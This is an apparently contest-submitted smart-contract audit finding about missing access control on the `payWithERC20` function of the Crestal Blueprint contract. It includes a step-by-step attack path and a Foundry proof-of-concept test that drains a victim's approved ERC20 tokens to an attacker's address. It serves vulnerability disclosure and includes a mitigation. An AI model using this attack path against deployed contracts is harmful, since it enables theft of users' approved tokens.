Refined Ash Crane

High

# Attacker may steal ERC20 tokens from agent creator

### Summary

Lack of access control in the `payWithERC20` function allows an attacker to directly call `payWithERC20` and steal users' approved ERC20 tokens.

### Root Cause

In [Payment.sol:25](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25) the `payWithERC20` function is public and lacks access control, allowing anyone to transfer tokens from any address that has approved the contract

### Internal Pre-conditions

User needs to approve tokens to the `Blueprint` contract

### External Pre-conditions

None

### Attack Path

1. Victim approves tokens to `Blueprint` contract for creating agents
2. Attacker calls `payWithERC20` with:
   - `fromAddress` = victim's address
   - `toAddress` = attacker's address
   - `amount`= approved amount
3. Attacker receives all approved tokens before victim can create agent

### Impact

The victim suffers loss of all approved tokens. The attacker gains the full approved token amount

### PoC

```solidity
    function test_Poc_stealErc20() public {
        address victim = makeAddr("victim");
        address attacker = makeAddr("attacker");

        uint256 validTokenAmount = 100 * 10 ** 18;

        // Add the payment address
        blueprint.addPaymentAddress(address(mockToken));

        // set none zero cost for create agents, use any number greater than 0
        blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);

        // Mint tokens to the victim account
        mockToken.mint(victim, validTokenAmount);
        
        vm.prank(victim);
        // Approve the blueprint contract to spend tokens directly from the victim account
        mockToken.approve(address(blueprint), validTokenAmount);

        vm.prank(attacker);
        // Steal all approved funds before call createAgentWithToken function
        blueprint.payWithERC20(address(mockToken), validTokenAmount, victim, attacker);

        assertEq(mockToken.balanceOf(attacker), validTokenAmount);
    }
```

### Mitigation

Add access control to payWithERC20 to only allow internal calls